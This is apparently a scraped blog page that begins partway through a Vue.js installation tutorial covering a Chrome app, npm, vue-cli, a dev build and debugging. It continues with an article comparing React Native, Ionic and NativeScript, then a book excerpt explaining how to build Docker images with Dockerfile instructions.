The next step is to create our main.js file, which will be the entry point for the Chrome application. The script should listen for the application launching and open a new window with the given size. Let's create a window of 500x300 size and open it with index.html:

chrome.app.runtime.onLaunched.addListener(function() {
  // Center the window on the screen.
  var screenWidth = screen.availWidth;
  var screenHeight = screen.availHeight;
  var width = 500;
  var height = 300;

  chrome.app.window.create("index.html", {
    id: "learningVueID",
    outerBounds: {
      width: width,
      height: height,
      left: Math.round((screenWidth - width) / 2),
      top: Math.round((screenHeight - height) / 2)
    }
  });
});

At this point the Chrome-specific application magic is over, and now we shall just create our index.html file, which does the same thing as in the previous examples. It will include the vue.js file and our script, where we will initialize our Vue application:

<html lang="en">
  <head>
    <meta charset="UTF-8">
    <title>Vue.js - CSP-compliant</title>
  </head>
  <body>
    <div id="app">
      <h1>{{ message }}</h1>
    </div>
    <script src="assets/vue.js"></script>
    <script src="assets/app.js"></script>
  </body>
</html>

Download the CSP-compliant version of vue.js and add it to the assets folder. Now let's create the app.js file and add the code that we have already written several times:

var data = { message: "Learning Vue.js" };
new Vue({ el: "#app", data: data });

Add it to the assets folder. Do not forget to create two icons of 16 and 128 pixels and call them icon_16.png and icon_128.png. Your code and structure in the end should look more or less like the following: structure and code for the sample Chrome application using vue.js.

And now the most important thing: let's check if it works! It is very, very simple:

Go to the chrome://extensions/ URL in your Chrome browser.
Check the Developer mode checkbox.
Click on Load unpacked extension... and choose the folder that we've just created.
Your app will appear in the list! Now just open a new tab, click on apps, and check that your app is there. Click on it!
Sample Chrome application using vue.js in the list of Chrome apps. Congratulations! You have just created a Chrome application!

NPM

The npm installation method is recommended for large-scale applications. Just run npm install vue:

# latest stable release
npm install vue
# latest stable CSP-compliant release
npm install vue@csp

And then require it:

var Vue = require("vue");

Or, for ES2015 lovers:

import Vue from "vue";

The HTML in our example will look exactly like in the previous examples:

<html lang="en">
  <head>
    <meta charset="UTF-8">
    <title>Vue.js - NPM Installation</title>
  </head>
  <body>
    <div id="app">
      <h1>{{ message }}</h1>
    </div>
    <script src="main.js"></script>
  </body>
</html>

Now let's create a script.js file that will look almost exactly the same as in the standalone or CDN version, with the only difference being that it requires vue.js:

var Vue = require("vue");
var data = { message: "Learning Vue.js" };
new Vue({ el: "#app", data: data });

Let's install vue and browserify in order to be able to compile our script.js into the main.js file:

npm install vue --save-dev
npm install browserify --save-dev

In the package.json file, also add a build script that executes browserify on script.js, transpiling it into main.js. So our package.json file will look like this:

{
  "name": "learningVue",
  "scripts": {
    "build": "browserify script.js -o main.js"
  },
  "version": "0.0.1",
  "devDependencies": {
    "browserify": "^13.0.1",
    "vue": "^1.0.25"
  }
}

Now run:

npm install
npm run build

And open index.html in the browser. I have a friend who at this point would say something like: really? So many steps, installations, commands, explanations… just to output some header? I'm out! If you are also thinking this, wait. Yes, this is true, we've just done something really simple in a rather complex way, but if you stay with me a bit longer, you will see how complex things become easy to implement if we use the proper tools. Also, do not forget to check your Pomodoro timer; maybe it's time to take a rest!

Vue-cli

Vue provides its own command-line interface that allows bootstrapping single-page applications using whatever workflow you want. It immediately provides hot reloading and a structure for a test-driven environment. After installing vue-cli, just run vue init <desired boilerplate> <project-name> and then just install and run!

# install vue-cli
$ npm install -g vue-cli
# create a new project
$ vue init webpack learn-vue
# install and run
$ cd learn-vue
$ npm install
$ npm run dev

Now open your browser on localhost:8080. You just used vue-cli to scaffold your application. Let's adapt it to our example. Open the source folder. In the src folder you will find an App.vue file. Do you remember we talked about Vue components being like bricks from which you build your application? Do you remember that we were creating them and registering them inside our main script file, and that I mentioned we would learn to build components in a more elegant way? Congratulations, you are looking at a component built in a fancy way!

Find the line that says import Hello from './components/Hello'. This is exactly how components are reused inside other components. Have a look at the template at the top of the component file. At some point it contains the tag <hello></hello>. This is exactly where the Hello component will appear in our HTML file. Have a look at this component; it is in the src/components folder. As you can see, it contains a template with {{ msg }} and a script that exports data with a defined msg.
This is exactly the same as what we were doing in our previous examples without using components. Let's slightly modify the code to make it the same as in the previous examples. In the Hello.vue file, change the msg in the data object:

<script>
export default {
  data () {
    return {
      msg: "Learning Vue.js"
    }
  }
}
</script>

In the App.vue component, remove everything from the template except the hello tag, so the template looks like this:

<template>
  <div id="app">
    <hello></hello>
  </div>
</template>

Now if you rerun the application, you will see our example with beautiful styles we didn't touch: a Vue application bootstrapped using vue-cli.

Besides the webpack boilerplate template, you can use the following configurations with vue-cli:

webpack-simple: A simple Webpack + vue-loader setup for quick prototyping.
browserify: A full-featured Browserify + vueify setup with hot-reload, linting, and unit testing.
browserify-simple: A simple Browserify + vueify setup for quick prototyping.
simple: The simplest possible Vue setup in a single HTML file.

Dev build

My dear reader, I can see your shining eyes and I can read your mind. Now that you know how to install and use Vue.js and how it works, you definitely want to put your hands deep into the core code and contribute! For this you need to use the development version of Vue.js, which you have to download from GitHub and compile yourself. Let's build our example with this development version of Vue. Create a new folder, for example, dev-build, and copy all the files from the npm example to this folder. Do not forget to copy the node_modules folder. You should cd into it and download the files from GitHub to it, then run npm install and npm run build:

cd <APP-PATH>/node_modules
git clone https://github.com/vuejs/vue.git
cd vue
npm install
npm run build

Now build our example application:

cd <APP-PATH>
npm install
npm run build

Open index.html in the browser; you will see the usual Learning Vue.js header. Let's now try to change something in the vue.js source! Go to the node_modules/vue/src folder and open the config.js file. The second line defines the delimiters:

let delimiters = ['{{', '}}']

This defines the delimiters used in the HTML templates. The things inside these delimiters are recognized as Vue data or as JavaScript code. Let's change them! Let's replace "{{" and "}}" with double percentage signs! Go on and edit the file:

let delimiters = ['%%', '%%']

Now rebuild both the Vue source and our application, and refresh the browser. What do you see? After changing the Vue source and replacing the delimiters, the {{}} delimiters do not work anymore! The message inside {{}} is no longer recognized as data that we passed to Vue. In fact, it is being rendered as part of the HTML. Now go to the index.html file and replace our curly-bracket delimiters with double percentage signs:

<div id="app">
  <h1>%% message %%</h1>
</div>

Rebuild our application and refresh the browser! What about now? You see how easy it is to change the framework's code and to try out your changes. I'm sure you have plenty of ideas about how to improve or add some functionality to Vue.js. So change it, rebuild, test, deploy! Happy pull requests!

Debug Vue application

You can debug your Vue application the same way you debug any other web application: use your developer tools, breakpoints, debugger statements, and so on. Vue also provides vue-devtools, which makes it easier to debug Vue applications.
You can download and install it from the Chrome web store: https://chrome.google.com/webstore/detail/vuejs-devtools/nhdogjmejiglipccpnnnanhbledajbpd

After installing it, open, for example, our shopping list application, and open the developer tools. You will see that a Vue tab has automatically appeared. In our case we only have one component: Root. As you can imagine, once we start working with components and have lots of them, they will all appear in the left part of the Vue devtools palette. Click on the Root component and inspect it. You'll see all the data attached to this component. If you try to change something, for example, add a shopping list item, check or uncheck a checkbox, change the title, and so on, all these changes will be immediately propagated to the data in the Vue devtools. You will immediately see the changes on the right side of it. Let's try, for example, to add a shopping list item. Once you start typing, you can see on the right how newItem changes accordingly: the changes in the models are immediately propagated to the Vue devtools data.

When we start adding more components and introduce complexity to our Vue applications, the debugging will certainly become more fun!

Summary

In this article we analyzed what goes on behind the scenes of Vue.js. We learned how to install Vue.js, and we also learned how to debug a Vue application.

Resources for Article:

Further resources on this subject:

API with MongoDB and Node.js [Article]
Tips & Tricks for Ext JS 3.x [Article]
Working with Forms using REST API [Article]
JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript

Bhagyashree R
03 Nov 2018
11 min read
Previously, when you wanted to build for both web and mobile, you would have to invest in separate teams with separate development workflows. Isn't that annoying? JavaScript-driven frameworks have changed this equation. You can now build mobile apps without having to learn a completely new language, such as Kotlin, Java, or Objective-C, or a new development approach, and instead use your current web development skills. One of the first technologies to do this was Cordova, which enabled web developers to package their web apps into a native binary and to access device APIs through plugins. Since then, developers have created a variety of alternative approaches to using JavaScript to drive native iOS and Android applications. In this article we will talk about three of these frameworks: React Native, Ionic, and NativeScript. After introducing these frameworks, we will move on to comparing them and try to find out which one is best in which scenarios.

What exactly are native and hybrid applications?

Before we start with the comparison, let's answer this simple question, as we are going to use these terms a lot in this article.

What are native applications?

Native applications are built for a particular platform and are written in a particular language. For example, Android apps are written in Java or Kotlin, and iOS apps are written in Objective-C or Swift. The word "native" here refers to a platform such as Android, iOS, or Windows Phone. Designed for a specific platform, these apps are considered to be more efficient in terms of performance, as well as more reliable. The downside of native applications is that a separate version of the app must be developed for each platform. As each version is written in a completely different programming language, you can't reuse any piece of code from another platform's version. That's why native app development is considered to be more time-consuming and expensive in comparison to hybrid applications, at least in theory.

What are hybrid applications?

Unlike native applications, hybrid applications are cross-platform. They are written in languages such as C# or JavaScript and compiled to be executed on each platform. For device-specific interactions, hybrid applications utilize the support of plugins. Developing them is faster and simpler, and they are less expensive, as you have to develop only one app instead of multiple native apps for different platforms. The major challenge with hybrid apps is that they run in a WebView, which means they depend on the native browser. Because of this, hybrid apps aren't as fast as native apps. You can also face serious challenges if the app requires complex interaction with the device; after all, there's a limit to what plugins can achieve on this front. As all the rendering is done using web tech, we can't produce a truly native user experience.

Let's now move on to the overview of the three frameworks.

What is React Native?

Source: React Native

The story of React Native started in the summer of 2013 as Facebook's internal hackathon project, and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, a JavaScript library for building user interfaces. The reason why it is called "native" is that the UI built with React Native consists of native UI widgets that look and feel consistent with apps built using native languages.

How does React Native work?
Under the hood, React Native translates your UI definition, written in JavaScript/JSX, into a hierarchy of native views correct for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and on Android, it will result in a native TextView. So, even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one. We are getting a "real native app".

But how does this "translation" take place? React Native runs on JavaScriptCore, the JavaScript engine, on iOS and Android, and then renders native components. React components return markup from their render function, which describes how they should look. With React for the web, this translates directly to the browser's DOM. For React Native, this markup is translated to suit the host platform, so a <View> might become an Android-specific TextView.

Applications built with React Native

All the recent features in the Facebook app, such as Blood Donations, Crisis Response, Privacy Shortcuts, and Wellness Checks, were built with React Native. Other companies or products that use this framework include Instagram, Bloomberg, Pinterest, Skype, Tesla, Uber, Walmart, Wix, Discord, Gyroscope, SoundCloud Pulse, Tencent QQ, Vogue, and many more.

What is Ionic framework?

Source: Ionic Framework

The Ionic framework was created by Drifty Co. and was initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies, such as HTML5, CSS, and JavaScript. With Ionic, you will be able to build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App.

How does Ionic framework work?

Ionic is mainly focused on an application's look and feel, or the UI interaction. This tells us that it's not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app. It uses these wrappers to gain access to host operating system features such as the camera, GPS, and flashlight. Ionic apps run in a low-level browser shell, like UIWebView on iOS or WebView on Android, which is wrapped by tools like Cordova/PhoneGap.

Currently, the Ionic framework has official integration with Angular, and support for Vue and React is in development. The team has recently released the Ionic 4 beta version, which comes with better support for Angular. This version supports the new Angular tooling and features, ensuring that Ionic apps follow Angular standards and conventions.

Applications built with Ionic

Some of the apps that use the Ionic framework are MarketWatch, Pacifica, Sworkit, Vertfolio, and many more. You can view the full list of applications built with the Ionic framework on their website.

What is NativeScript?

Source: NativeScript

NativeScript is developed by Telerik (a subsidiary of Progress) and was first released in 2014. It's an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example, TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript result in fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio.
Additionally, software developers can repurpose third-party libraries from CocoaPods, Android Arsenal, Maven, and npm in their mobile applications without the need for wrappers.

How does NativeScript work?

Since the applications are built in JavaScript, there is a need for some proxy mechanism to translate JavaScript code to the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a "bridge" between the JavaScript and the native worlds (Android and iOS). The runtimes facilitate calling APIs in the Android and iOS frameworks using JavaScript code. To do that, JavaScript virtual machines are used: Google's V8 for Android, and WebKit's JavaScriptCore implementation distributed with iOS 7.0+.

Applications built with NativeScript

Some of the applications built with NativeScript are Strudel, BitPoints Wallet, Regelneef, and Dwitch.

React Native vs Ionic vs NativeScript

Now that we've introduced all three frameworks, let's tackle the difficult question: which framework is better?

#1 Learning curve

The time needed to learn any technology depends on the knowledge you already have. If you are a web developer familiar with HTML5, CSS, and JavaScript, it will be fairly easy for you to get started with all three frameworks. But if you are coming from a mobile development background, the learning curve will be a bit steep for all three. Among the three of them, the Ionic framework is the easiest to learn and implement, and it also has great documentation.

#2 Community support

Going by the GitHub stats, React Native is way ahead of the other two frameworks, be it in terms of the popularity of the repository or the number of contributors. This year's GitHub Octoverse report also highlighted that React Native is one of the most active open source projects currently. The following table shows the stats at the time of writing:

Framework      Stars   Forks   Contributors
React Native   70150   15712   1767
Ionic          35664   12205   272
NativeScript   15200   1129    119

Source: GitHub

Comparing these three frameworks by weekly package downloads on the npm website also indicates that React Native is the most popular framework among the three. Source: npm trends

#3 Performance

Ionic apps, as mentioned earlier, are hybrid apps, which means they run in a WebView. Hybrid applications, as mentioned in the beginning, are arguably slower compared to JavaScript-driven native applications, as their speed depends on the WebView. This also makes Ionic less suitable for high-performance or UI-intensive apps, such as games. React Native, in turn, provides faster application speed. Since React works separately from the main UI thread, your application can maintain high performance without sacrificing capability. Additionally, the introduction of the React Fiber algorithm, which was implemented with the goal of accelerating visual rendering, adds to its better performance. In the case of NativeScript, rendering can slow down an application. Also, applications built with NativeScript for the Android platform are larger in size, which negatively affects performance.

#4 Marketplace

The marketplace for Ionic is great. The tool lists many starter apps, themes, and plugins; plugins range from a DatePicker to Google Maps. Similarly, NativeScript has its official marketplace, listing 923 plugins in total. React Native, on the other hand, does not have a dedicated marketplace from Facebook.
However, there are some companies that do provide React Native plugins and starter apps.

#5 Reusability of the codebase

Because Ionic is a framework for developing "wrapped applications", it wins the code reusability contest hands down. Essentially, the very concept of Ionic is "write once, run everywhere". NativeScript isn't far behind Ionic in terms of code reusability. In August this year, the Progress team announced that they are working on a code-sharing project. To realize this code-sharing dream, the Angular and NativeScript teams have together created nativescript-schematics, a schematic that enables you to build both web and mobile apps from a single project. In the case of React Native, you will be able to reuse the logic and structure of the components; however, you will have to rewrite the UI used in them. React Native follows a different approach: "learn once, write everywhere". This means that the same team of developers who built the iOS version will be able to understand enough to build the Android version, but they still need to have some knowledge of Android. With React Native you will end up having two separate projects. That's fine, because they are for two different platforms, but their internal structure will still be very similar.

So, which JavaScript mobile framework is best?

All three mobile frameworks come with their pros and cons. They are meant for the same objective but different project requirements. Choosing any one of them depends on your project, your users' requirements, and the skills of your team. While Ionic comes with the benefit of a single codebase, it's not suitable for graphics-intensive applications. React Native provides better performance than the other two, but adds the overhead of creating a native shell for each platform. The best thing about NativeScript is that it supports Vue, which is one of the fastest growing JavaScript frameworks, but its downside is that it makes the app size large. In the future we will see more such frameworks helping developers quickly prototype, develop, and ship cross-platform applications. One of them is Flutter by Google, which is already creating a wave.

Nativescript 4.1 has been released
React Native 0.57 released with major improvements in accessibility APIs, WKWebView-backed implementation, and more!
Ionic framework announces Ionic 4 Beta
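To make the earlier "How does React Native work?" discussion concrete, here is a minimal sketch of a React Native component; it is our own illustration rather than code from any of the apps mentioned above. The View and Text primitives below are rendered as native widgets on each platform, not as browser DOM elements:

import React from 'react';
import { Text, View } from 'react-native';

// A plain React component: React Native translates <View> and <Text>
// into native views for the target platform at runtime.
const Greeting = () => (
  <View style={{ padding: 24 }}>
    <Text>Learning React Native</Text>
  </View>
);

export default Greeting;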
Building Docker images using Dockerfiles

Aarthi Kumaraswamy
12 Apr 2018
8 min read
Docker images are read-only templates. They give us containers during runtime. Central to this is the concept of a 'base image'. Layers then sit on top of this base image. For example, you might have a base image of Fedora or Ubuntu, but you can then install packages or make modifications over the base image to create a new layer. The base image and the new layer can then be treated as a completely new image. In the image below, Debian is the base image and emacs and Apache are the two layers added on top of it. They are highly portable and can be shared easily:

Source: Docker Image layers

Layers are transparently laid on top of the base image to create a single coherent filesystem. There are a couple of ways to create images: one is by manually committing layers, and the other is through Dockerfiles. In this recipe, we'll create images with Dockerfiles. Dockerfiles help us automate image creation and get precisely the same image every time we want it. The Docker builder reads instructions from a text file (a Dockerfile) and executes them one after the other, in order. It can be compared to a Vagrantfile, which allows you to configure VMs in a predictable manner.

Getting ready

You need a Dockerfile with build instructions. Create an empty directory:

$ mkdir sample_image
$ cd sample_image

Create a file named Dockerfile with the following content:

$ cat Dockerfile
# Pick up the base image
FROM fedora
# Add author name
MAINTAINER Neependra Khare
# Add the command to run at the start of container
CMD date

How to do it…

Run the following command inside the directory where we created the Dockerfile, to build the image:

$ docker build .

We did not specify any repository or tag name while building the image. We can give those with the -t option as follows:

$ docker build -t fedora/test .

The preceding output is different from what we saw earlier; here we are using a cache after each instruction. Docker tries to save the intermediate images, as we saw earlier, and tries to use them in subsequent builds to accelerate the build process. If you don't want to cache the intermediate images, then add the --no-cache option to the build. Let's take a look at the available images now:

How it works…

A context defines the files used to build the Docker image. In the preceding command, we defined the context for the build. The build is done by the Docker daemon, and the entire context is transferred to the daemon. This is why we see the Sending build context to Docker daemon 2.048 kB message. If there is a file named .dockerignore in the current working directory with a list of files and directories (newline separated), then those files and directories will be ignored by the build context. More details about .dockerignore can be found at https://docs.docker.com/reference/builder/#the-dockerignore-file.

After executing each instruction, Docker commits the intermediate image and runs a container with it for the next instruction. After the next instruction has run, Docker again commits the container to create the intermediate image and removes the intermediate container created in the previous step. For example, in the preceding screenshot, eb9f10384509 is an intermediate image, and c5d4dd2b3db9 and ffb9303ab124 are the intermediate containers. After the last instruction is executed, the final image will be created.
In this case, the final image is 4778dd1f1a7a. The -a option can be specified with the docker images command to look for intermediate layers:

$ docker images -a

There's more…

The format of the Dockerfile is:

INSTRUCTION arguments

Generally, instructions are given in uppercase, but they are not case sensitive. They are evaluated in order. A # at the beginning of a line is treated as a comment. Let's take a look at the different types of instructions:

FROM: This must be the first instruction of any Dockerfile; it sets the base image for subsequent instructions. By default, the latest tag is assumed:

FROM <image>

Alternatively, consider the following form with a tag:

FROM <image>:<tag>

There can be more than one FROM instruction in one Dockerfile to create multiple images. If only image names, such as Fedora and Ubuntu, are given, then the images will be downloaded from the default Docker registry (Docker Hub). If you want to use private or third-party images, then you have to specify them as follows:

[registry_hostname[:port]/][user_name/](repository_name:version_tag)

Here is an example using the preceding syntax:

FROM registry-host:5000/nkhare/f20:httpd

MAINTAINER: This sets the author for the generated image: MAINTAINER <name>.

RUN: We can execute the RUN instruction in two ways. First, run the command in a shell (sh -c):

RUN <command> <param1> ... <paramN>

Second, directly run an executable:

RUN ["executable", "param1", ..., "paramN"]

As we know, with Docker we create an overlay, a layer on top of another layer, to make the resulting image. Through each RUN instruction, we create and commit a layer on top of the earlier committed layer. A container can be started from any of the committed layers. By default, Docker tries to cache the layers committed by different RUN instructions so that they can be used in subsequent builds. However, this behavior can be turned off using the --no-cache flag while building the image.

LABEL: Docker 1.6 added a new feature for attaching arbitrary key-value pairs to Docker images and containers. We covered part of this in the Labeling and filtering containers recipe in Chapter 2, Working with Docker Containers. To give a label to an image, we use the LABEL instruction in the Dockerfile, such as LABEL distro=fedora21.

CMD: The CMD instruction provides a default executable to run when a container starts. If the CMD instruction does not have an executable (the second form below), then it provides arguments to ENTRYPOINT:

CMD ["executable", "param1", ..., "paramN"]
CMD ["param1", ..., "paramN"]
CMD <command> <param1> ... <paramN>

Only one CMD instruction is allowed in a Dockerfile. If more than one is specified, then only the last one will be honored.

ENTRYPOINT: This helps us configure the container as an executable. Similar to CMD, there can be at most one ENTRYPOINT instruction; if more than one is specified, then only the last one will be honored:

ENTRYPOINT ["executable", "param1", ..., "paramN"]
ENTRYPOINT <command> <param1> ... <paramN>

Once the parameters are defined with the ENTRYPOINT instruction, they cannot be overwritten at runtime. However, CMD can be used to supply different default parameters to ENTRYPOINT.

EXPOSE: This exposes the network ports on the container on which it will listen at runtime:

EXPOSE <port> [<port> ... ]

We can also expose a port while starting the container. We covered this in the Exposing a port while starting a container recipe in Chapter 2, Working with Docker Containers.

ENV: This will set the environment variable <key> to <value>.
The variable will be passed to all the future instructions and will persist when a container is run from the resulting image:

ENV <key> <value>

ADD: This copies files from the source to the destination:

ADD <src> <dest>

The following form is for paths containing whitespace:

ADD ["<src>"... "<dest>"]

<src>: This must be a file or directory inside the build directory from which we are building the image, which is also called the context of the build. A source can be a remote URL as well.

<dest>: This must be the absolute path inside the container to which the files/directories from the source will be copied.

COPY: This is similar to ADD:

COPY <src> <dest>
COPY ["<src>"... "<dest>"]

VOLUME: This instruction creates a mount point with the given name and flags it as mounting an external volume, using the following syntax:

VOLUME ["/data"]

Alternatively, you can use the following form:

VOLUME /data

USER: This sets the username for any of the run instructions that follow it, using the following syntax:

USER <username>/<UID>

WORKDIR: This sets the working directory for the RUN, CMD, and ENTRYPOINT instructions that follow it. It can have multiple entries in the same Dockerfile. A relative path can be given, which will be relative to the earlier WORKDIR instruction, using the following syntax:

WORKDIR <PATH>

ONBUILD: This adds trigger instructions to the image that will be executed later, when this image is used as the base image for another image. The trigger will run as part of the FROM instruction in the downstream Dockerfile, using the following syntax:

ONBUILD [INSTRUCTION]

See also

Look at the help option of docker build:

$ docker build --help

The documentation on the Docker website: https://docs.docker.com/reference/builder/

You just enjoyed an excerpt from the book DevOps: Puppet, Docker, and Kubernetes by Thomas Uphill, John Arundel, Neependra Khare, Hideto Saito, Hui-Chuan Chloe Lee, and Ke-Jou Carol Hsu. To master working with Docker containers, images, and much more, check out this book today!

Read other posts:

How to publish Docker and integrate with Maven
Building Scalable Microservices
How to deploy RethinkDB using Docker
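As a quick recap of the instruction reference above, here is a small illustrative Dockerfile of our own (not taken from the recipe) that combines several of the instructions covered. The httpd package, the paths, and the index.html file are assumptions for illustration, and older Fedora base images may ship yum instead of dnf:

# Base image; FROM must be the first instruction
FROM fedora
# Image metadata
MAINTAINER Neependra Khare
LABEL distro=fedora21
# Install a package; each RUN commits a new layer (httpd chosen for illustration)
RUN dnf install -y httpd
# Environment variable available to later instructions and at runtime
ENV DOCROOT /var/www/html
# Copy a file from the build context into the image (index.html is assumed to exist)
COPY index.html ${DOCROOT}/index.html
# Port the container listens on at runtime
EXPOSE 80
# Default executable and its default arguments when the container starts
ENTRYPOINT ["httpd"]
CMD ["-D", "FOREGROUND"]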